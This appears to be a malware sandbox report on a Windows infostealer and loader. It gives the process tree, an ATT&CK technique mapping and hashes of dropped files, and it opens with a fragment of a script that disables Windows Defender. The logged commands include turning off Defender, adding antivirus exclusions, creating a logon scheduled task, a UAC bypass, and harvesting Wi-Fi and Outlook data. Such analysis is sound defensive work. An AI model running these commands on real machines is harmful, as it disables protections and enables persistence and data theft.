 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
                5⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3404
                • C:\Windows\system32\sc.exe
                  "C:\Windows\system32\sc.exe" qc windefend
                  6⤵
                  • Launches sc.exe
                  PID:2184
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                  6⤵
                    PID:3600
                  • C:\Windows\system32\whoami.exe
                    "C:\Windows\system32\whoami.exe" /groups
                    6⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3472
                  • C:\Windows\system32\net1.exe
                    "C:\Windows\system32\net1.exe" start TrustedInstaller
                    6⤵
                      PID:1740
                  • C:\Windows\SYSTEM32\cmd.exe
                    "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                    5⤵
                      PID:100
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        6⤵
                          PID:4620
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profile
                          6⤵
                            PID:3192
                          • C:\Windows\system32\findstr.exe
                            findstr All
                            6⤵
                              PID:4984
                          • C:\Windows\SYSTEM32\cmd.exe
                            "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                            5⤵
                              PID:1820
                              • C:\Windows\system32\chcp.com
                                chcp 65001
                                6⤵
                                  PID:3028
                                • C:\Windows\system32\netsh.exe
                                  netsh wlan show networks mode=bssid
                                  6⤵
                                    PID:1724
                          • C:\Users\Admin\AppData\Local\Temp\Infected.exe
                            "C:\Users\Admin\AppData\Local\Temp\Infected.exe"
                            2⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1588
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\Admin\AppData\Roaming\Loaader.exe"' & exit
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4748
                              • C:\Windows\system32\schtasks.exe
                                schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\Admin\AppData\Roaming\Loaader.exe"'
                                4⤵
                                • Creates scheduled task(s)
                                PID:4788
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5851.tmp.bat""
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:332
                              • C:\Windows\system32\timeout.exe
                                timeout 3
                                4⤵
                                • Delays execution with timeout.exe
                                PID:1056
                              • C:\Users\Admin\AppData\Roaming\Loaader.exe
                                "C:\Users\Admin\AppData\Roaming\Loaader.exe"
                                4⤵
                                • Modifies Windows Defender Real-time Protection settings
                                • UAC bypass
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Windows security modification
                                • Accesses Microsoft Outlook profiles
                                • Checks whether UAC is enabled
                                • Checks processor information in registry
                                • Suspicious use of AdjustPrivilegeToken
                                • System policy modification
                                • outlook_office_path
                                • outlook_win_path
                                PID:4300
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell" Get-MpPreference -verbose
                                  5⤵
                                    PID:3480
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add - MpPreference - ExclusionExtension ".exe"
                                    5⤵
                                      PID:2504
                                    • C:\Windows\SYSTEM32\cmd.exe
                                      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                      5⤵
                                        PID:1132
                                        • C:\Windows\system32\chcp.com
                                          chcp 65001
                                          6⤵
                                            PID:5052
                                          • C:\Windows\system32\netsh.exe
                                            netsh wlan show profile
                                            6⤵
                                              PID:4812
                                            • C:\Windows\system32\findstr.exe
                                              findstr All
                                              6⤵
                                                PID:4740
                                            • C:\Windows\SYSTEM32\cmd.exe
                                              "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                              5⤵
                                                PID:4400
                                                • C:\Windows\system32\chcp.com
                                                  chcp 65001
                                                  6⤵
                                                    PID:2764
                                                  • C:\Windows\system32\netsh.exe
                                                    netsh wlan show networks mode=bssid
                                                    6⤵
                                                      PID:4784
                                            • C:\Users\Admin\AppData\Local\Temp\WinDefend.exe
                                              "C:\Users\Admin\AppData\Local\Temp\WinDefend.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3356
                                          • C:\Windows\servicing\TrustedInstaller.exe
                                            C:\Windows\servicing\TrustedInstaller.exe
                                            1⤵
                                              PID:1880
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                2⤵
                                                • Modifies Windows Defender Real-time Protection settings
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of WriteProcessMemory
                                                PID:4156
                                                • C:\Windows\system32\sc.exe
                                                  "C:\Windows\system32\sc.exe" qc windefend
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:2320
                                                • C:\Windows\system32\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                  3⤵
                                                    PID:4136
                                                  • C:\Windows\system32\whoami.exe
                                                    "C:\Windows\system32\whoami.exe" /groups
                                                    3⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3516
                                                  • C:\Windows\system32\net1.exe
                                                    "C:\Windows\system32\net1.exe" stop windefend
                                                    3⤵
                                                      PID:4852
                                                    • C:\Windows\system32\sc.exe
                                                      "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                      3⤵
                                                      • Launches sc.exe
                                                      PID:1796
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                    2⤵
                                                    • Modifies data under HKEY_USERS
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1620
                                                    • C:\Windows\system32\sc.exe
                                                      "C:\Windows\system32\sc.exe" qc windefend
                                                      3⤵
                                                      • Launches sc.exe
                                                      PID:184
                                                    • C:\Windows\system32\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                      3⤵
                                                        PID:4584
                                                      • C:\Windows\system32\whoami.exe
                                                        "C:\Windows\system32\whoami.exe" /groups
                                                        3⤵
                                                          PID:1364
                                                        • C:\Windows\system32\net1.exe
                                                          "C:\Windows\system32\net1.exe" stop windefend
                                                          3⤵
                                                            PID:3176
                                                          • C:\Windows\system32\sc.exe
                                                            "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                            3⤵
                                                            • Launches sc.exe
                                                            PID:4440

                                                      Network

                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                      Execution

                                                      Scheduled Task/Job

                                                      1
                                                      T1053

                                                      Persistence

                                                      Create or Modify System Process

                                                      1
                                                      T1543

                                                      Windows Service

                                                      1
                                                      T1543.003

                                                      Boot or Logon Autostart Execution

                                                      1
                                                      T1547

                                                      Registry Run Keys / Startup Folder

                                                      1
                                                      T1547.001

                                                      Scheduled Task/Job

                                                      1
                                                      T1053

                                                      Privilege Escalation

                                                      Create or Modify System Process

                                                      1
                                                      T1543

                                                      Windows Service

                                                      1
                                                      T1543.003

                                                      Abuse Elevation Control Mechanism

                                                      1
                                                      T1548

                                                      Bypass User Account Control

                                                      1
                                                      T1548.002

                                                      Boot or Logon Autostart Execution

                                                      1
                                                      T1547

                                                      Registry Run Keys / Startup Folder

                                                      1
                                                      T1547.001

                                                      Scheduled Task/Job

                                                      1
                                                      T1053

                                                      Defense Evasion

                                                      Modify Registry

                                                      5
                                                      T1112

                                                      Impair Defenses

                                                      3
                                                      T1562

                                                      Disable or Modify Tools

                                                      3
                                                      T1562.001

                                                      Abuse Elevation Control Mechanism

                                                      1
                                                      T1548

                                                      Bypass User Account Control

                                                      1
                                                      T1548.002

                                                      Credential Access

                                                      Unsecured Credentials

                                                      1
                                                      T1552

                                                      Credentials In Files

                                                      1
                                                      T1552.001

                                                      Discovery

                                                      Query Registry

                                                      4
                                                      T1012

                                                      System Information Discovery

                                                      4
                                                      T1082

                                                      Collection

                                                      Data from Local System

                                                      1
                                                      T1005

                                                      Email Collection

                                                      1
                                                      T1114

                                                      Command and Control

                                                      Web Service

                                                      1
                                                      T1102

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\Browsers\Mozilla\Firefox\Bookmarks.txt
                                                        Filesize

                                                        105B

                                                        MD5

                                                        2e9d094dda5cdc3ce6519f75943a4ff4

                                                        SHA1

                                                        5d989b4ac8b699781681fe75ed9ef98191a5096c

                                                        SHA256

                                                        c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

                                                        SHA512

                                                        d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\Directories\OneDrive.txt
                                                        Filesize

                                                        25B

                                                        MD5

                                                        966247eb3ee749e21597d73c4176bd52

                                                        SHA1

                                                        1e9e63c2872cef8f015d4b888eb9f81b00a35c79

                                                        SHA256

                                                        8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e

                                                        SHA512

                                                        bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\Directories\Startup.txt
                                                        Filesize

                                                        24B

                                                        MD5

                                                        68c93da4981d591704cea7b71cebfb97

                                                        SHA1

                                                        fd0f8d97463cd33892cc828b4ad04e03fc014fa6

                                                        SHA256

                                                        889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483

                                                        SHA512

                                                        63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Desktop.jpg
                                                        Filesize

                                                        83KB

                                                        MD5

                                                        33f8252f1a80aa7db228cfed8fb0ddd1

                                                        SHA1

                                                        9fa0f358d608bcd64b4040e2995cff03fd4c2771

                                                        SHA256

                                                        0715af0be6995d74b017192602aea3e50d58b49c3b32a7db9240277f9442fbe0

                                                        SHA512

                                                        b806a77ca06c74ee8724ac584876080ce0ac2109de7826f99b2e778cd77ae86be3bfd39920df3fe8d2b6794fd1259eb61211e47d511caf254c5a01c176ff07f1

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
                                                        Filesize

                                                        742B

                                                        MD5

                                                        5808be638260ca4a777716ad8b2bda3a

                                                        SHA1

                                                        f22c92b7e4620badc6ea8add29f7af900445f182

                                                        SHA256

                                                        30b7670d3b3cffe86064792daefa5a0fb27049e97cf30ecce6f504a3eaf73ee5

                                                        SHA512

                                                        08a3f50227b199ae96422280ac56e45519170ad462bfabd641588b75e18728b1de104f4d6e87b70e9b1f27b83df227a2a6a4aacc1b2987c0ec5bff7f6cadab1a

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
                                                        Filesize

                                                        2KB

                                                        MD5

                                                        252b721b8dd5a441d9ce6a6c90fb7043

                                                        SHA1

                                                        cb4052301c89032f74d7755e290f4ff4de1ece28

                                                        SHA256

                                                        506b2b9af88400e84c9079e2942fe08fc209d6714f5152c4f5bcd6716af65ec8

                                                        SHA512

                                                        51e3cfd517416c0e83f118c3a951c0cb703f0109c69720a444b20a7f7f8218912218183259be85ec9d0363bcd9d143f7ddb962e9581322427821d5109060b9d0

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
                                                        Filesize

                                                        2KB

                                                        MD5

                                                        383d8c66bc8ed75a7b6d3e10ff70e7e8

                                                        SHA1

                                                        e1fbed1bfbc386f4398e0b223b3c2ba7a8e60cef

                                                        SHA256

                                                        7245d614086025477a0025c33923dac068558f504d79e2e9625fbab171e3b060

                                                        SHA512

                                                        dd18179f343ee20220086553b30d936a887be497b11e7b3278f95869ec618726cbc53a196b94906a05e29601ab2ce6452aa6709fb48535a55cd2cebecaad9223

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
                                                        Filesize

                                                        3KB

                                                        MD5

                                                        1763796657c4821f7da65cd58958fe5e

                                                        SHA1

                                                        f22c4574278b832b06acc57e08b844830c6c0b50

                                                        SHA256

                                                        074b0d200f0f818ca63753baa4c9d2474efe615fc2f738e648edf24897a0049e

                                                        SHA512

                                                        738fa5b41375338fb1a167ca544ca06d7d64ed55665dd19e5c67b90bf68ef19cc4bee83e9dd7d900d1a6aa8cfe6d5a239750e89c976109bfc7454ac04669bd8c

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
                                                        Filesize

                                                        3KB

                                                        MD5

                                                        42bfb8614c9596871c1f6a437f650c32

                                                        SHA1

                                                        a394d287f010374b39450e1cd32769d9c2c0d01d

                                                        SHA256

                                                        c8d52921e5ca76b97b475fdf3d0eaa8032be769547f94eaecdc428588d5b34b3

                                                        SHA512

                                                        75e87dd12c81e75e795d13a4b262d13e146dcbd43a380ab296d8801639feab860c2bb14e711ce3bc9e83d7f39d675d36ca55443d66978ebf70a23cd079b51dee

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
                                                        Filesize

                                                        5KB

                                                        MD5

                                                        0299f7801f4eceda24a77d57b342c108

                                                        SHA1

                                                        eb1895fd738ee4f4a000eecad5a7cc1f965db743

                                                        SHA256

                                                        598d702e6795325ecef334cdeca85d4213701bf3471895216224940b117f6f49

                                                        SHA512

                                                        215655bc14ab1fc20b727699b521fd86533ed067f87f550ac3331f9c773528efa11322754b882db27dba8f06856de526936af9a4c56a898106fa53396e3f757f

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
                                                        Filesize

                                                        496B

                                                        MD5

                                                        bcf28ad00abeb35eee9aa2dbf34f2176

                                                        SHA1

                                                        0c340eb04f9e076d9ca5b0b6a78b412f6b12cc69

                                                        SHA256

                                                        6b61adae52bda65bc9a6b75a22e92198b35b752067e70197add4ba2cb422549c

                                                        SHA512

                                                        36194c451b37876eba28744af713de65e5badd80c79cc2577650e6ed84b5f2bde5f15f8e3790a796b57c0286e87269212f6dcdab8ff6fe11407078ef2258ae32

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
                                                        Filesize

                                                        808B

                                                        MD5

                                                        e1c6adc65ef4ba5cfcb166f19954efae

                                                        SHA1

                                                        fedeba2d590948c6493aee09a352655a9a3f2db1

                                                        SHA256

                                                        a46d56fead8f9e7caadd22a9c39b45eaea07e1e267fe1b07c13543349d08057a

                                                        SHA512

                                                        f444f19d47abb2fffb907ba560662298d8ed37029eada2f319437362368c9cb4bd0ea608a2e2500c350c5365691909edb02f177706c7d9e27048ba9476a29938

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
                                                        Filesize

                                                        4KB

                                                        MD5

                                                        e6031fc0dfd84ce7b161d4a5ef3b4846

                                                        SHA1

                                                        db5ff7134c86e0d686887fa321876ac726a28e21

                                                        SHA256

                                                        c38f7a1648f35d956be187b2b775429b894deaf6caab56361b33664bd51063f1

                                                        SHA512

                                                        4d3e33a444d585ea9bfa243f1b14cdcfe51574faa27206068917022ada7e2ee349e697fdd7ab6a9835b83ebb311e144e5a583d34acc890fc1eb741b1e159075f

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\ProductKey.txt
                                                        Filesize

                                                        29B

                                                        MD5

                                                        71eb5479298c7afc6d126fa04d2a9bde

                                                        SHA1

                                                        a9b3d5505cf9f84bb6c2be2acece53cb40075113

                                                        SHA256

                                                        f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3

                                                        SHA512

                                                        7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Windows.txt
                                                        Filesize

                                                        170B

                                                        MD5

                                                        6450d0e56fe8a9b6ac09c875370dae0d

                                                        SHA1

                                                        ed63ea15d9dae8fce7480b9fa027c076dcc0d392

                                                        SHA256

                                                        7f35aba59494fed8dc66f460e57ee18c0f3d7a4067d44044fb662ce31007ff79

                                                        SHA512

                                                        ac32fcec88e54c99103df45dcf78443ad4607ff44800d0020aed704d484cee221754e054130500087a020d314d40cbf2a230dd3905816c79bd7f54126cd77067

                                                      • C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\msgid.dat
                                                        Filesize

                                                        1B

                                                        MD5

                                                        cfcd208495d565ef66e7dff9f98764da

                                                        SHA1

                                                        b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                        SHA256

                                                        5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                        SHA512

                                                        31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                        Filesize

                                                        3KB

                                                        MD5

                                                        556084f2c6d459c116a69d6fedcc4105

                                                        SHA1

                                                        633e89b9a1e77942d822d14de6708430a3944dbc

                                                        SHA256

                                                        88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                                        SHA512

                                                        0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        331841fe482ffe8b1cc1509733d8ca67

                                                        SHA1

                                                        1e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8

                                                        SHA256

                                                        14112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f

                                                        SHA512

                                                        039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        ac3bf9756600f6c31a15240716e6e7c6

                                                        SHA1

                                                        521aa76b55f74cafd1b579933dc0fae439acb0f5

                                                        SHA256

                                                        f7bc65b2962543bb5165f2b1bb6b3390ed3b55801475b2fd7701129cc8a081fd

                                                        SHA512

                                                        96ae0dddaeadae05fed313707076af5d443d328d2ea8524aa283812591b615b596a0aab1d2918471aba59f5546cebca7521bd2003db63a24f548899bee5fa67a

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        903dd097e8b2c8bb426ed99a913c2821

                                                        SHA1

                                                        4ecc4a94d7c88faf53fe12897bc0c8112ed57016

                                                        SHA256

                                                        cc6dc58f1d7bb6a3dc70a1ea7cae87d46af1f843e581299392896dec867764c6

                                                        SHA512

                                                        3045f7c42371c01675b45277d66d7cf3069c2967107f3cbedff28691a980f3d0f15663bb9e19de91e3306776d9a1549c5894708d6e7ccfb176e807bcea6ff48d

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        Filesize

                                                        944B

                                                        MD5

                                                        77d622bb1a5b250869a3238b9bc1402b

                                                        SHA1

                                                        d47f4003c2554b9dfc4c16f22460b331886b191b

                                                        SHA256

                                                        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                        SHA512

                                                        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                      • C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                        Filesize

                                                        74KB

                                                        MD5

                                                        7ac0adf482250172280defec7a7054da

                                                        SHA1

                                                        20a25f0da68c309d062c4628ead8b6f377ac7969

                                                        SHA256

                                                        3caa5f06008365fbecf46198744793c36c42309b49a6324bebe8123be10f87d5

                                                        SHA512

                                                        d03d033b931f3d39f95a1ec1cdc7d9014783f11b2438c265dd72c0bc34f9d5ced534a38c7c1c88ff930868fd9cf60521dd556b5c486c5cf364f798f39215a1aa

                                                      • C:\Users\Admin\AppData\Local\Temp\Infected.exe
                                                        Filesize

                                                        63KB

                                                        MD5

                                                        b8d455465260a845db35492fda5a8888

                                                        SHA1

                                                        287b0ba049ad8f3be802d2224efb86dba72d3221

                                                        SHA256

                                                        a150a433c6a3e4278f6cc4cbc85863fc431e5c1e65081ad67253513e8ca01282

                                                        SHA512

                                                        5dba43ae31420de362593752e8ff491afbe8d20f183f6b95e6962ea1e637c7bf3bd50b5213e4d928a96b85d9b54841ee697798b0089624b13ef7eded826cd86a

                                                      • C:\Users\Admin\AppData\Local\Temp\WinDefend.exe
                                                        Filesize

                                                        87KB

                                                        MD5

                                                        5fc6a541845fdafb597ddfb98fa28b54

                                                        SHA1

                                                        22e5dd50ddd71bc39c812db0f9b164ca10c556dd

                                                        SHA256

                                                        64e4dedb36812766c522c79cae57b7f3b2694efaa396151d4117a70282166117

                                                        SHA512

                                                        f174e4ccc89d4a7473001a9153a9c3d63bedd393dda1ea3be171768b7587846722ad07445adeafa52ef54802a8ac84eb33ab1799248dcbf7db60aa4f311da5e3

                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kkjimjl4.n2i.ps1
                                                        Filesize

                                                        60B

                                                        MD5

                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                        SHA1

                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                        SHA256

                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                        SHA512

                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                      • C:\Users\Admin\AppData\Local\Temp\tmp556F.tmp.dat
                                                        Filesize

                                                        46KB

                                                        MD5

                                                        8f5942354d3809f865f9767eddf51314

                                                        SHA1

                                                        20be11c0d42fc0cef53931ea9152b55082d1a11e

                                                        SHA256

                                                        776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

                                                        SHA512

                                                        fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

                                                      • C:\Users\Admin\AppData\Local\Temp\tmp5583.tmp.dat
                                                        Filesize

                                                        5.0MB

                                                        MD5

                                                        b01182fd0bcfecd25f0378b6ddd50714

                                                        SHA1

                                                        faf0abd8ccde904e4ec90d216f9dada2c3a046d3

                                                        SHA256

                                                        921d4d81de816c9f7add02a5c5dc28209959a2ce1bdd64eff6675a5cdbd90a55

                                                        SHA512

                                                        a409fe0c1fbbcc158d47f6f727446ddf754b99ec235715f5f03b66a4f0c91b93c8bbd9e7ab235ed65e9b0abdd4bf2899dd3e5ec4afa8f45822e6f3dbc9d1bd7d

                                                      • C:\Users\Admin\AppData\Local\Temp\tmp5738.tmp.bat
                                                        Filesize

                                                        150B

                                                        MD5

                                                        c726c6d30b88c81a6422cf1167f1be3c

                                                        SHA1

                                                        41618e68127a94197db964ea2a15b4b79274967e

                                                        SHA256

                                                        189433df1179d57fb6ba451507566d7e094311fb41be82f8eaaba8d7cb7c114b

                                                        SHA512

                                                        6a9d4b67e3a1e087d5e8ccb3bd4f2f88d842d1b6317c4e62305bd78402b214c25819c8cc301daed79ca8511a73ab380fb93e3c45d0272c23ba60e5777408c67c

                                                      • C:\Users\Admin\AppData\Local\Temp\tmp5851.tmp.bat
                                                        Filesize

                                                        151B

                                                        MD5

                                                        0c285ea7d11623d191e400eb484b7685

                                                        SHA1

                                                        45d42ad9f4e524b1622cefbbfbe33b1b78b80725

                                                        SHA256

                                                        6b31bbeadbebe0aaab4d442d518b6e439ea6a4f9b504e9ddd3de1a131aad707b

                                                        SHA512

                                                        4bc899e70b2f8151d0f6540c6c3d3b41a102feec3c59c54c11a46b0d013f4973d173ea4e00b8d6b7d04a1efa2ec8d850d52a0110e8df15845f9e62b892b20e39

                                                      • C:\Users\Admin\AppData\Local\Temp\tmpB591.tmp.dat
                                                        Filesize

                                                        100KB

                                                        MD5

                                                        9df444e0de734921d4d96deeeac4b16e

                                                        SHA1

                                                        31542622ecf896b93d830e21595091aef8742901

                                                        SHA256

                                                        1d324d34d58165aca7dbf057a7417457776b4e805d60182401a9275fb7920900

                                                        SHA512

                                                        2de6a0ac09b7a1a21cda31e49c072b097ca1959814c535920a099a9df87e993ba2dfd6cebcb8ec2110efca385bb618f771258575a06736afcfd6cd40a8e1a957

                                                      • C:\Users\Admin\AppData\Local\Temp\tmpB5C2.tmp.dat
                                                        Filesize

                                                        152KB

                                                        MD5

                                                        73bd1e15afb04648c24593e8ba13e983

                                                        SHA1

                                                        4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91

                                                        SHA256

                                                        aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b

                                                        SHA512

                                                        6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

                                                      • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
                                                        Filesize

                                                        8B

                                                        MD5

                                                        cf759e4c5f14fe3eec41b87ed756cea8

                                                        SHA1

                                                        c27c796bb3c2fac929359563676f4ba1ffada1f5

                                                        SHA256

                                                        c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

                                                        SHA512

                                                        c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

                                                      • C:\Users\Public\SSSS.log
                                                        Filesize

                                                        4KB

                                                        MD5

                                                        92ffc7990c74845bcd0896e7632509e2

                                                        SHA1

                                                        c15233e1a6428991fcab1f35da144f2cde30d4e3

                                                        SHA256

                                                        1518f9c6553e3d55482431c56892c142e4e87948d6f557f91528eb57ec3456f6

                                                        SHA512

